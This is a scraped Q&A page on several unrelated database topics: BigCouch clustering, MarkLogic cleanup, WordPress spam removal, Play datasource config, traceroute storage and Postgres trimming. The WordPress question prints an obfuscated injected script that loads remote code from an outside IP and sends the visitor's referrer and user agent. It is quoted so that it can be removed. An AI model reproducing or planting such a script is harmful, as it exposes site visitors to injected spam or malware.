I am new to the bigcouch.I have successfully setup bigcouch on two different system which is working perfectly fine.
On first bigcouch i have some dbs which i want to be replicate onto other bigcouch.And i copied all the shards from first bigcouch to other one.And then i used clustering command to make them clustered.
curl -X PUT db01.yourhostname.com:5986/nodes/bigcouch#db02.yourhostname.com -d {}
its gives the success result.but when i try to create any new database it gives an internal sever error.
My first question,Is this a good way to do clustering after coping shards from one to other.I am not sure if it is a correct way to do it.so can any one tell me how to do it successfully or I am missing something.
thanks.
Check that both servers are cluster aware of each other by issuing the following on each.
curl 127.0.0.1:5984/_membership
If that looks ok maybe try ping from one to the other using the FQDN to make sure it's resolvable. Bigcouch assumes resolvable FQDN by default.
Also, i've seen this happen when you try change the FQDN. Either in the erlang nodename or the server hostname. There doesn't seem to be any coping mechanism for that.
Related
I have multiple databases in my local which I do not need. Can I run a curl script or a REST API command where I can delete the database, it's servers and all of the forests so that I can use gradle to just deploy them again?
I have tried to manually delete the server first, then the database and then the forests. This is a lengthy process.
I want a single command to do the whole job for me instead of manually having to delete the components one by one which is possible through the admin interface.
Wagner Michael has a fair point in his comment. If you already used (ml-)Gradle to create servers and databases, why not use its mlUndeploy -Pconfirm=true task to get rid of them? You could potentially even use a fake project, with stub configs to get rid of a fairly random set of databases and servers, though that still takes some manual work.
By far the quickest way to reset your entire MarkLogic, is to stop it, and wipe its data directory. This SO question gives instructions on how to do it, as part of a solution to recover when you lost your admin password:
https://stackoverflow.com/a/27803923/918496
HTH!
I have a website I am working on that was recently hacked with a SPAM injection. Everything is secured now but I am tasked with cleaning up the remains of a script put on each page. The problem I am facing is that there are special characters used throughout the hack and escaping the special characters is proving to be very challenging.
I am also using a Query builder but even that is getting confused.
The code I am trying to remove is this:
<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinsz|var|u0026u|referrer|bhsyf||js|php'.split('|'),0,{}))
As you can see once I start escaping characters I start to get lost. I was wondering if anyone has come across this and found an easier way.
I have successfully gone in an manually deleted the code directly in the database but unfortunately there is about 1006 locations and it just takes forever.
Unfortunately, modifying a Wordpress database with direct SQL queries can break PHP serialized strings and objects. So even if you come up with the perfect search term, don't do it that way.
Instead, you might try this awesome Search Replace DB tool. Make sure you follow all of their pleas about cautious use of the script, especially: do a backup first, use a very cryptic directory name, and remove the folder as soon as you're done. Also make sure you have php-mbstring running.
The web interface is really nice, but depending on the server setup, it can fail to work. There's also a command line interface, though. To use it, cd into the folder that has the tool. There's documentation for the CLI version in the README.md file. Here's the basic shape of a command to address your case, which you'll need to test and adjust to match your database setup:
php srdb.cli.php --host localhost.or.dbserver --name dbnamehere --user dbuserhere --pass 'dbpasswordhere' --search '/\<noindex\>\<script id\=\"wpinfo\-pst1\".*?<\\/noindex>/s' --replace '' --regex --dry-run
I love this tool's --dry-run feature, which is set in the code above. After you've done lots of dry-runs and are confident you're doing what you intend to do, remove that option from the command line (or uncheck the "dry-run" box if you're in the web interface) and the replace will actually happen. Then, remember, remove the tool so that no one else can use it.
Say I have a database called "awesome" which is located on a live server and at the same time duplicated on a staging server for testing. My web app is based on Play 2.1.1 using Scala.
So I have these datasources defined in my application.conf file:
db.awesome-test.driver= com.mysql.jdbc.Driver
db.awesome-test.url="jdbc:mysql://127.0.1.1/awesome"
db.awesome-test.user=mr_awesome_tester
db.awesome-test.password=justtesting
db.awesome-live.driver= com.mysql.jdbc.Driver
db.awesome-live.url="jdbc:mysql://127.0.0.1/awesome"
db.awesome-live.user=mr_awesome
db.awesome-live.password=omgthisisawesome
Depending on what environment I am on, I would like to use either DB.withConnection("awesome-test") or DB.withConnection("awesome-live"). I am controlling this via another value in my config; so I e.g. put environment=awesome-live in there and then get the respective connection string via Play.configuration.
Now, the problem is that apparently play attempts to create a DB connection to each datasource defined in the config right away. A) This fails depending on which environment I am on. E.g. on the staging machine I will get something like this (pic is only a mock-up of course) because the live DB is not reachable:
...although it is completely unnecessary to try to connect to that DB, because it will never be used in this environment. B) Even if the connection would work, of course it would not be feasable to create two connections (live and testing) when only one of the two is ever needed.
Is there a way to tell Play to defer/postpone creation of the DB connection until it is actually needed (e.g. when DB.getConnection("...") or DB.withConnection("...") or something is called for that datasource)?
I am thinking something like db.awesome-live.deferCreation=true.
Cheers, Alex
I'd say that you have two ways of doing this.
Everything is explained at the Play! Documentation: Additional configuration
Specifying alternative configuration file
test.conf
db.awesome.driver= com.mysql.jdbc.Driver
db.awesome.url="jdbc:mysql://127.0.1.1/awesome"
db.awesome.user=mr_awesome_tester
db.awesome.password=justtesting
live.conf
db.awesome.driver= com.mysql.jdbc.Driver
db.awesome.url="jdbc:mysql://127.0.0.1/awesome"
db.awesome.user=mr_awesome
db.awesome.password=omgthisisawesome
In code you always use DB.withConnection("awesome").
Start the application with
$ start -Dconfig.resource=test.conf
or
$ start -Dconfig.resource=live.conf
Overriding specific configuration keys
In your case that means:
$ start -Ddb.awesome-live.deferCreation=true
One traceroute record may include :
Timestamp. Milliseconds resolution.
Variable number of hops.
Each hops contains, ip address, hostname and rtt.
Overall results e.g. successful, network unreachable, timed out.
Thanks.
I would use a database. You could use SQLite if you don't want to run a database server.
More details:
There is this nice little sqlite addon for firefox:
https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager
That should help you set things up. I would create a field for each of the values I want to store and on for the entire result perhaps and an primary key "id" field.
Getting your data into the database would be least trivial part. If your running linux, you could write a bash shell script that captures the output of traceroute and calls a PHP shell script which inserts the data into the DB. Of course you can use Python or any language you like which supports your DB.
I want to cut Postgres to its minimal size for purpose of including just database function with my application. I'm using Portable Postgres found on internet.
Any suggestions what I can delete from Postgres installation which is not needed for normal database use?
You can delete all the standalone tools in /bin - it can all be done with psql. Keep anything that starts wth pg_, postgres and initdb.
You can probably delete a bunch of conversions in lib/ (the some_and_some.so) files, but probably not until after you've initdb'ed. And be careful not to delete one you'll be using at some point - they are dynamically loaded so you won't notice until a client connects with a different encoding for example.
But note that this probably won't get you much - on my system with debug enabled etc, the binaries take 17Mb. The clean data directory with no data at all in it takes 33Mb, about twice as much. Which you will need if you're going to be able to use your database..